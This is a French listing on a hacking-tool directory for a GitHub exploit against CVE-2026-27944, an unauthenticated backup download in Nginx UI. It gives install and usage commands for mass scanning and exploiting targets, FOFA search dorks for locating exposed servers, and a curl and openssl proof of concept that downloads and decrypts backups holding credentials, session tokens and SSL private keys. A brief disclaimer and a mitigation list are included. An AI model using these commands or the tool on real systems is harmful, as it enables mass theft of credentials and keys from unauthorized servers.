Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Cve-2026-27944-Tools-Exploit — Comme tu veux | Kitploit
Outils/GitHubGitHub/bimabalance/cve-2026-27944-tools-exploit
ReconnaissanceOutils de Chiffrement/DéchiffrementAttaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'Informations
GitHub

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
bimabalance/cve-2026-27944-tools-exploit

Cve-2026-27944-Tools-Exploit

Comme tu veux

Voir le dépôt
1il y a 1 moisPas encore vérifié
Partager

🚀 CVE-2026-27944: Exploitation de sauvegarde non authentifiée de Nginx UI

📌 Description

27944.py est un outil d'exploitation pour CVE-2026-27944 qui permet à un attaquant de télécharger et décrypter la sauvegarde de Nginx UI sans authentification.

Cette vulnérabilité se trouve dans Nginx UI version < 2.3.2 et permet d'accéder à :

· Identifiants utilisateur et tokens de session · Clés privées SSL · Configuration Nginx · Fichiers de base de données

🔧 Fonctionnalités

· ✅ Scan massif à partir d'un fichier de cibles · ✅ Exploit sur cible unique · ✅ Téléchargement automatique de la sauvegarde · ✅ Déchiffrement automatique AES-256-CBC · ✅ Extraction automatique des identifiants depuis la sauvegarde

🛠️ Installation

root@kitploit:~
git clone https://github.com/bimabalance/CVE-2026-27944.git
cd CVE-2026-27944
pip install -r requirements.txt

🚀 Utilisation

  1. Scan massif
root@kitploit:~
python 27944.py -f targets.txt -o hasil_scan
  1. Exploit sur cible unique
root@kitploit:~
python 27944.py -t target.com:9000 --exploit --decrypt
  1. Exploit complet
root@kitploit:~
python 27944.py -f targets.txt --exploit --decrypt -o hasil_full

📋 Format des cibles

root@kitploit:~
target1.com:9000
192.168.1.1:9000
target2.com:8080

🎯 Dork FOFA

root@kitploit:~
title="Nginx UI"
icon_hash="-1565173320"
header="X-Backup-Security"
body="Nginx UI" && port="9000"
title="Nginx UI" && country="ID"

📂 Résultat de sortie

root@kitploit:~
results/
├── results.json
├── target_backup.bin
├── target_backup_decrypted.zip
└── target_extracted/
    ├── app.ini
    ├── database.db
    ├── nginx.conf
    └── ssl/

⚠️ Avertissement

Cet outil a été créé à des fins éducatives et de test de sécurité éthique. L'auteur n'est pas responsable de l'utilisation abusive de cet outil. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite de tester.

📝 Explication technique

CVE-2026-27944 est une vulnérabilité critique dans Nginx UI qui permet à un attaquant d'accéder au point de terminaison /api/backup sans authentification. La sauvegarde contient des données sensibles chiffrées avec AES-256, mais la clé et l'IV sont envoyés via l'en-tête X-Backup-Security au format Base64.

Score CVSS : 9.8 (Critique)

Version affectée : Nginx UI < 2.3.2

Mitigation :

  1. Mettre à jour vers Nginx UI v2.3.3
  2. Bloquer l'accès à /api/backup
  3. Rotation de tous les identifiants

💀 POC

root@kitploit:~
# Cek vulnerability
curl -I http://target:9000/api/backup

# Download backup
curl -s http://target:9000/api/backup -o backup.bin

# Decrypt backup (manual)
openssl enc -d -aes-256-cbc -base64 -K <key> -iv <iv> -in backup.bin -out backup_decrypted.zip
Télécharger l’outil